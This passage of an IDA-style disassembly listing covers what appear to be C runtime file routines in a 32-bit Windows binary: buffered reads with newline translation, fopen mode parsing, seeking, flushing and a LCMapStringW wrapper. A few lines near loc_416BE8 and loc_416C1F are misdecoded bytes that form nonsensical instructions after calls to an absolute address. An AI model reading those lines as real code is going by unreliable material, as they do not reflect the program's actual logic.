jz short loc_416379
cmp edi, 1
jz short loc_416347
cmp edi, 2
jnz short loc_41635D
loc_416347: ; CODE XREF: sub_416300+40�j
push 2
call sub_419252
push 1
mov ebp, eax
call sub_419252
pop ecx
cmp eax, ebp
pop ecx
jz short loc_416379
loc_41635D: ; CODE XREF: sub_416300+45�j
push edi
call sub_419252
pop ecx
push eax
call ds:dword_41C070 ; CloseHandle
test eax, eax
jnz short loc_416379
call ds:dword_41C068 ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_41637B
; ---------------------------------------------------------------------------
loc_416379: ; CODE XREF: sub_416300+3B�j
; sub_416300+5B�j ...
xor ebp, ebp
loc_41637B: ; CODE XREF: sub_416300+77�j
push edi
call sub_4191D8
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_416396
push ebp
call sub_41724D
pop ecx
jmp short loc_4163AB
; ---------------------------------------------------------------------------
loc_416396: ; CODE XREF: sub_416300+8B�j
xor eax, eax
jmp short loc_4163AE
; ---------------------------------------------------------------------------
loc_41639A: ; CODE XREF: sub_416300+E�j
; sub_416300+2F�j
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
loc_4163AB: ; CODE XREF: sub_416300+94�j
or eax, 0FFFFFFFFh
loc_4163AE: ; CODE XREF: sub_416300+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_416300 endp
; =============== S U B R O U T I N E =======================================
sub_4163B3 proc near ; CODE XREF: sub_4119F0+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_4163DC
test al, 8
jz short loc_4163DC
push dword ptr [esi+8]
call sub_410C83
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_4163DC: ; CODE XREF: sub_4163B3+A�j
; sub_4163B3+E�j
pop esi
retn
sub_4163B3 endp
; =============== S U B R O U T I N E =======================================
sub_4163DE proc near ; CODE XREF: sub_41647E+2D�p
; sub_41647E+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4163F0
push esi
call sub_41647E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4163F0: ; CODE XREF: sub_4163DE+7�j
push esi
call sub_416419
test eax, eax
pop ecx
jz short loc_416400
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_416400: ; CODE XREF: sub_4163DE+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_416415
push dword ptr [esi+10h]
call sub_41928F
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_4163DE+26�j
xor eax, eax
pop esi
retn
sub_4163DE endp
; =============== S U B R O U T I N E =======================================
sub_416419 proc near ; CODE XREF: sub_4119F0+1A�p
; seg000:00411E35�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_416466
test ax, 108h
jz short loc_416466
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_416466
push edi
push eax
push dword ptr [esi+10h]
call sub_417DAC
add esp, 0Ch
cmp eax, edi
jnz short loc_41645F
mov eax, [esi+0Ch]
test al, 80h
jz short loc_416466
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_416466
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_416419+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_416466: ; CODE XREF: sub_416419+14�j
; sub_416419+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_416419 endp
; =============== S U B R O U T I N E =======================================
sub_416475 proc near ; CODE XREF: seg000:00418068�p
push 1
call sub_41647E
pop ecx
retn
sub_416475 endp
; =============== S U B R O U T I N E =======================================
sub_41647E proc near ; CODE XREF: sub_4163DE+A�p
; sub_416475+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp ds:dword_460B40, esi
jle short loc_4164DC
loc_41648F: ; CODE XREF: sub_41647E+5C�j
mov eax, ds:dword_45FB34
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4164D3
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_4164D3
cmp [esp+0Ch+arg_0], 1
jnz short loc_4164B9
push eax
call sub_4163DE
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4164D3
inc ebx
jmp short loc_4164D3
; ---------------------------------------------------------------------------
loc_4164B9: ; CODE XREF: sub_41647E+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_4164D3
test cl, 2
jz short loc_4164D3
push eax
call sub_4163DE
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4164D3
or edi, eax
loc_4164D3: ; CODE XREF: sub_41647E+1B�j
; sub_41647E+23�j ...
inc esi
cmp esi, ds:dword_460B40
jl short loc_41648F
loc_4164DC: ; CODE XREF: sub_41647E+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_4164E7
mov eax, edi
loc_4164E7: ; CODE XREF: sub_41647E+65�j
pop edi
pop esi
pop ebx
retn
sub_41647E endp
; =============== S U B R O U T I N E =======================================
sub_4164EB proc near ; CODE XREF: sub_411A46+A9�p
; sub_41269C+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_4165BF
test al, 40h
jnz loc_4165BF
test al, 2
jz short loc_416511
or al, 20h
mov [esi+0Ch], eax
jmp loc_4165BF
; ---------------------------------------------------------------------------
loc_416511: ; CODE XREF: sub_4164EB+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_416525
push esi
call sub_417F59
pop ecx
jmp short loc_41652A
; ---------------------------------------------------------------------------
loc_416525: ; CODE XREF: sub_4164EB+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41652A: ; CODE XREF: sub_4164EB+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_4165C4
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_4165AE
cmp eax, 0FFFFFFFFh
jz short loc_4165AE
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_416583
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41656C
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, ds:dword_460B60[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_416571
; ---------------------------------------------------------------------------
loc_41656C: ; CODE XREF: sub_4164EB+6B�j
mov edi, offset dword_42E7F0
loc_416571: ; CODE XREF: sub_4164EB+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_416583
or dh, 20h
mov [esi+0Ch], edx
loc_416583: ; CODE XREF: sub_4164EB+62�j
; sub_4164EB+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_4165A0
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_4165A0
test ch, 4
jnz short loc_4165A0
mov dword ptr [esi+18h], 1000h
loc_4165A0: ; CODE XREF: sub_4164EB+9F�j
; sub_4164EB+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4165AE: ; CODE XREF: sub_4164EB+55�j
; sub_4164EB+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_4165BF: ; CODE XREF: sub_4164EB+A�j
; sub_4164EB+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_4164EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4165C4 proc near ; CODE XREF: sub_411A46+90�p
; sub_4164EB+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, ds:dword_460C60
jnb loc_4167A1
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:460B60h[eax*4]
mov eax, ds:dword_460B60[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_4167A1
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_416679
test dl, 2
jnz short loc_416679
test dl, 48h
jz short loc_416639
mov al, [eax+5]
cmp al, 0Ah
jz short loc_416639
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_416639: ; CODE XREF: sub_4165C4+56�j
; sub_4165C4+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call ds:dword_41C094 ; ReadFile
test eax, eax
jnz short loc_41668C
call ds:dword_41C068 ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_416674
mov ds:dword_45F844, 9
mov ds:dword_45F848, ecx
jmp loc_4167B2
; ---------------------------------------------------------------------------
loc_416674: ; CODE XREF: sub_4165C4+99�j
cmp eax, 6Dh
jnz short loc_416680
loc_416679: ; CODE XREF: sub_4165C4+4C�j
; sub_4165C4+51�j
xor eax, eax
jmp loc_4167B5
; ---------------------------------------------------------------------------
loc_416680: ; CODE XREF: sub_4165C4+B3�j
push eax
call sub_41724D
pop ecx
jmp loc_4167B2
; ---------------------------------------------------------------------------
loc_41668C: ; CODE XREF: sub_4165C4+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41679C
test edx, edx
jz short loc_4166B1
cmp byte ptr [edi], 0Ah
jnz short loc_4166B1
or al, 4
jmp short loc_4166B3
; ---------------------------------------------------------------------------
loc_4166B1: ; CODE XREF: sub_4165C4+E2�j
; sub_4165C4+E7�j
and al, 0FBh
loc_4166B3: ; CODE XREF: sub_4165C4+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_416796
loc_4166CB: ; CODE XREF: sub_4165C4+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_416786
cmp al, 0Dh
jz short loc_4166E7
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_416778
; ---------------------------------------------------------------------------
loc_4166E7: ; CODE XREF: sub_4165C4+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_416705
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_4166FC
add [ebp+arg_8], 2
jmp short loc_41675A
; ---------------------------------------------------------------------------
loc_4166FC: ; CODE XREF: sub_4165C4+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_416778
; ---------------------------------------------------------------------------
loc_416705: ; CODE XREF: sub_4165C4+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_41C094 ; ReadFile
test eax, eax
jnz short loc_41672D
call ds:dword_41C068 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_416774
loc_41672D: ; CODE XREF: sub_4165C4+15D�j
cmp [ebp+var_C], 0
jz short loc_416774
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41674F
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41675A
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_416778
; ---------------------------------------------------------------------------
loc_41674F: ; CODE XREF: sub_4165C4+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41675F
cmp [ebp+var_1], 0Ah
jnz short loc_41675F
loc_41675A: ; CODE XREF: sub_4165C4+136�j
; sub_4165C4+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_416777
; ---------------------------------------------------------------------------
loc_41675F: ; CODE XREF: sub_4165C4+18E�j
; sub_4165C4+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_4169A2
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_416778
loc_416774: ; CODE XREF: sub_4165C4+167�j
; sub_4165C4+16D�j
mov byte ptr [edi], 0Dh
loc_416777: ; CODE XREF: sub_4165C4+199�j
inc edi
loc_416778: ; CODE XREF: sub_4165C4+11E�j
; sub_4165C4+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_4166CB
jmp short loc_416796
; ---------------------------------------------------------------------------
loc_416786: ; CODE XREF: sub_4165C4+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_416796
or al, 2
mov [esi], al
loc_416796: ; CODE XREF: sub_4165C4+101�j
; sub_4165C4+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41679C: ; CODE XREF: sub_4165C4+DA�j
mov eax, [ebp+var_8]
jmp short loc_4167B5
; ---------------------------------------------------------------------------
loc_4167A1: ; CODE XREF: sub_4165C4+12�j
; sub_4165C4+39�j
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
loc_4167B2: ; CODE XREF: sub_4165C4+AB�j
; sub_4165C4+C3�j
or eax, 0FFFFFFFFh
loc_4167B5: ; CODE XREF: sub_4165C4+B7�j
; sub_4165C4+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_4165C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167BA proc near ; CODE XREF: sub_411B2E+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:dword_45FB04
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_4167F3
cmp al, 72h
jz short loc_4167EC
cmp al, 77h
jnz loc_416907
mov ecx, 301h
jmp short loc_4167F8
; ---------------------------------------------------------------------------
loc_4167EC: ; CODE XREF: sub_4167BA+21�j
xor ecx, ecx
or esi, 1
jmp short loc_4167FB
; ---------------------------------------------------------------------------
loc_4167F3: ; CODE XREF: sub_4167BA+1D�j
mov ecx, 109h
loc_4167F8: ; CODE XREF: sub_4167BA+30�j
or esi, 2
loc_4167FB: ; CODE XREF: sub_4167BA+37�j
push 1
pop edx
loc_4167FE: ; CODE XREF: sub_4167BA+8B�j
; sub_4167BA+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_4168ED
cmp edx, ebx
jz loc_4168ED
movsx eax, al
cmp eax, 54h
jg short loc_41688C
jz short loc_41687C
sub eax, 2Bh
jz short loc_416866
sub eax, 19h
jz short loc_41685C
sub eax, 0Eh
jz short loc_416847
dec eax
jnz loc_4168DE
cmp [ebp+var_4], ebx
jnz loc_4168DE
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_4167FE
; ---------------------------------------------------------------------------
loc_416847: ; CODE XREF: sub_4167BA+6F�j
cmp [ebp+var_4], ebx
jnz loc_4168DE
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_4167FE
; ---------------------------------------------------------------------------
loc_41685C: ; CODE XREF: sub_4167BA+6A�j
test cl, 40h
jnz short loc_4168DE
or ecx, 40h
jmp short loc_4167FE
; ---------------------------------------------------------------------------
loc_416866: ; CODE XREF: sub_4167BA+65�j
test cl, 2
jnz short loc_4168DE
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_4167FE
; ---------------------------------------------------------------------------
loc_41687C: ; CODE XREF: sub_4167BA+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_4168DE
or ecx, eax
jmp loc_4167FE
; ---------------------------------------------------------------------------
loc_41688C: ; CODE XREF: sub_4167BA+5E�j
sub eax, 62h
jz short loc_4168D9
dec eax
jz short loc_4168C2
sub eax, 0Bh
jz short loc_4168AB
sub eax, 6
jnz short loc_4168DE
test ch, 0C0h
jnz short loc_4168DE
or ch, 40h
jmp loc_4167FE
; ---------------------------------------------------------------------------
loc_4168AB: ; CODE XREF: sub_4167BA+DD�j
cmp [ebp+var_8], ebx
jnz short loc_4168DE
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_4167FE
; ---------------------------------------------------------------------------
loc_4168C2: ; CODE XREF: sub_4167BA+D8�j
cmp [ebp+var_8], ebx
jnz short loc_4168DE
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_4167FE
; ---------------------------------------------------------------------------
loc_4168D9: ; CODE XREF: sub_4167BA+D5�j
test ch, 0C0h
jz short loc_4168E5
loc_4168DE: ; CODE XREF: sub_4167BA+72�j
; sub_4167BA+7B�j ...
xor edx, edx
jmp loc_4167FE
; ---------------------------------------------------------------------------
loc_4168E5: ; CODE XREF: sub_4167BA+122�j
or ch, 80h
jmp loc_4167FE
; ---------------------------------------------------------------------------
loc_4168ED: ; CODE XREF: sub_4167BA+4A�j
; sub_4167BA+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_4192E6
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41690B
loc_416907: ; CODE XREF: sub_4167BA+25�j
xor eax, eax
jmp short loc_416925
; ---------------------------------------------------------------------------
loc_41690B: ; CODE XREF: sub_4167BA+14B�j
mov eax, [ebp+arg_C]
inc ds:dword_45FA04
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_416925: ; CODE XREF: sub_4167BA+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4167BA endp
; =============== S U B R O U T I N E =======================================
sub_41692A proc near ; CODE XREF: sub_411B2E�p
mov edx, ds:dword_460B40
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41699B
mov ebx, ds:dword_45FB34
mov edi, ebx
loc_416946: ; CODE XREF: sub_41692A+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_416961
test byte ptr [ecx+0Ch], 83h
jz short loc_41695C
inc eax
add edi, 4
cmp eax, edx
jl short loc_416946
jmp short loc_41699B
; ---------------------------------------------------------------------------
loc_41695C: ; CODE XREF: sub_41692A+26�j
mov esi, [ebx+eax*4]
jmp short loc_416985
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: sub_41692A+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_410C0F
pop ecx
mov ecx, ds:dword_45FB34
mov [edi+ecx], eax
mov eax, ds:dword_45FB34
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41699B
mov esi, edi
loc_416985: ; CODE XREF: sub_41692A+35�j
cmp esi, ebp
jz short loc_41699B
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41699B: ; CODE XREF: sub_41692A+12�j
; sub_41692A+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41692A endp
; =============== S U B R O U T I N E =======================================
sub_4169A2 proc near ; CODE XREF: seg000:00411E65�p
; sub_412B27+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, ds:dword_460C60
push esi
push edi
jnb short loc_416A24
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:460B60h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_416A24
push eax
call sub_419252
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4169E6
mov ds:dword_45F844, 9
jmp short loc_416A35
; ---------------------------------------------------------------------------
loc_4169E6: ; CODE XREF: sub_4169A2+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:dword_41C098 ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_416A06
call ds:dword_41C068 ; RtlGetLastWin32Error
jmp short loc_416A08
; ---------------------------------------------------------------------------
loc_416A06: ; CODE XREF: sub_4169A2+5A�j
xor eax, eax
loc_416A08: ; CODE XREF: sub_4169A2+62�j
test eax, eax
jz short loc_416A15
push eax
call sub_41724D
pop ecx
jmp short loc_416A35
; ---------------------------------------------------------------------------
loc_416A15: ; CODE XREF: sub_4169A2+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_416A38
; ---------------------------------------------------------------------------
loc_416A24: ; CODE XREF: sub_4169A2+D�j
; sub_4169A2+2A�j
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
loc_416A35: ; CODE XREF: sub_4169A2+42�j
; sub_4169A2+71�j
or eax, 0FFFFFFFFh
loc_416A38: ; CODE XREF: sub_4169A2+80�j
pop edi
pop esi
pop ebx
retn
sub_4169A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A3C proc near ; CODE XREF: seg000:00411E28�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_416A58
mov [edi+4], ebx
loc_416A58: ; CODE XREF: sub_416A3C+17�j
push 1
push ebx
push esi
call sub_4169A2
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_416AC6
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_416A7D
sub eax, [edi+4]
jmp loc_416B8F
; ---------------------------------------------------------------------------
loc_416A7D: ; CODE XREF: sub_416A3C+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_416AB7
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, ds:dword_460B60[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_416ACE
mov edx, ecx
loc_416AA8: ; CODE XREF: sub_416A3C+79�j
cmp edx, eax
jnb short loc_416ACE
cmp byte ptr [edx], 0Ah
jnz short loc_416AB4
inc [ebp+var_8]
loc_416AB4: ; CODE XREF: sub_416A3C+73�j
inc edx
jmp short loc_416AA8
; ---------------------------------------------------------------------------
loc_416AB7: ; CODE XREF: sub_416A3C+50�j
test dl, 80h
jnz short loc_416ACE
mov ds:dword_45F844, 16h
loc_416AC6: ; CODE XREF: sub_416A3C+2D�j
or eax, 0FFFFFFFFh
jmp loc_416B8F
; ---------------------------------------------------------------------------
loc_416ACE: ; CODE XREF: sub_416A3C+68�j
; sub_416A3C+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_416ADC
mov eax, [ebp+var_8]
jmp loc_416B8F
; ---------------------------------------------------------------------------
loc_416ADC: ; CODE XREF: sub_416A3C+96�j
test byte ptr [edi+0Ch], 1
jz loc_416B87
mov edx, [edi+4]
test edx, edx
jnz short loc_416AF5
and [ebp+var_8], edx
jmp loc_416B87
; ---------------------------------------------------------------------------
loc_416AF5: ; CODE XREF: sub_416A3C+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:460B60h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_416B81
push 2
push 0
push [ebp+var_C]
call sub_4169A2
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_416B48
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_416B33: ; CODE XREF: sub_416A3C+104�j
cmp eax, ecx
jnb short loc_416B42
cmp byte ptr [eax], 0Ah
jnz short loc_416B3F
inc [ebp+arg_0]
loc_416B3F: ; CODE XREF: sub_416A3C+FE�j
inc eax
jmp short loc_416B33
; ---------------------------------------------------------------------------
loc_416B42: ; CODE XREF: sub_416A3C+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_416B7C
; ---------------------------------------------------------------------------
loc_416B48: ; CODE XREF: sub_416A3C+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_4169A2
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_416B6F
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_416B6F
test ch, 4
jz short loc_416B72
loc_416B6F: ; CODE XREF: sub_416A3C+124�j
; sub_416A3C+12C�j
mov eax, [edi+18h]
loc_416B72: ; CODE XREF: sub_416A3C+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_416B7C: ; CODE XREF: sub_416A3C+10A�j
jz short loc_416B81
inc [ebp+arg_0]
loc_416B81: ; CODE XREF: sub_416A3C+D9�j
; sub_416A3C:loc_416B7C�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_416B87: ; CODE XREF: sub_416A3C+A4�j
; sub_416A3C+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_416B8F: ; CODE XREF: sub_416A3C+3C�j
; sub_416A3C+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_416A3C endp
; ---------------------------------------------------------------------------
loc_416B94: ; CODE XREF: sub_412027+A3�p
; sub_4156C1+A5�p ...
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41C858
push offset sub_417B48
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
xor edi, edi
cmp ds:dword_45F8C4, edi
jnz short loc_416C0A
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_41C850
mov esi, 100h
push esi
push edi
call ds:dword_41C178 ; LCMapStringW
test eax, eax
jz short loc_416BE8
mov ds:dword_45F8C4, ebx
jmp short loc_416C0A
; ---------------------------------------------------------------------------
loc_416BE8: ; CODE XREF: seg000:00416BDE�j
push edi
push edi
push ebx
push offset dword_42F3E4
push esi
push edi
call near ptr 3D0000h
xor al, [ebp+22840FC0h]
add [eax], eax
add bh, al
add eax, offset dword_45F8C4
add al, [eax]
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_416C0A: ; CODE XREF: seg000:00416BC2�j
; seg000:00416BE6�j
cmp [ebp+14h], edi
jle short loc_416C1F
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
call sub_416DB8
pop ecx
pop ecx
mov [ebp+14h], eax
loc_416C1F: ; CODE XREF: seg000:00416C0D�j
mov eax, ds:dword_45F8C4
cmp eax, 2
jnz short loc_416C46
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 3D0000h
scasb
jmp loc_416D24
; ---------------------------------------------------------------------------
loc_416C46: ; CODE XREF: seg000:00416C27�j
cmp eax, 1
jnz loc_416D22
cmp [ebp+20h], edi
jnz short loc_416C5C
mov eax, ds:dword_45F8E0
mov [ebp+20h], eax
loc_416C5C: ; CODE XREF: seg000:00416C52�j
push edi
push edi
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
mov eax, [ebp+24h]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push dword ptr [ebp+20h]
call ds:dword_41C120 ; MultiByteToWideChar
mov ebx, eax
mov [ebp-1Ch], ebx
cmp ebx, edi
jz loc_416D22
mov [ebp-4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_410BE0
mov [ebp-18h], esp
mov eax, esp
mov [ebp-24h], eax
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_416CB7
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
xor edi, edi
mov [ebp-24h], edi
or dword ptr [ebp-4], 0FFFFFFFFh
mov ebx, [ebp-1Ch]
loc_416CB7: ; CODE XREF: seg000:00416CA2�j
cmp [ebp-24h], edi
jz short loc_416D22
push ebx
push dword ptr [ebp-24h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push 1
push dword ptr [ebp+20h]
call ds:dword_41C120 ; MultiByteToWideChar
test eax, eax
jz short loc_416D22
push edi
push edi
push ebx
push dword ptr [ebp-24h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_41C178 ; LCMapStringW
mov esi, eax
mov [ebp-28h], esi
cmp esi, edi
jz short loc_416D22
test byte ptr [ebp+0Dh], 4
jz short loc_416D36
cmp [ebp+1Ch], edi
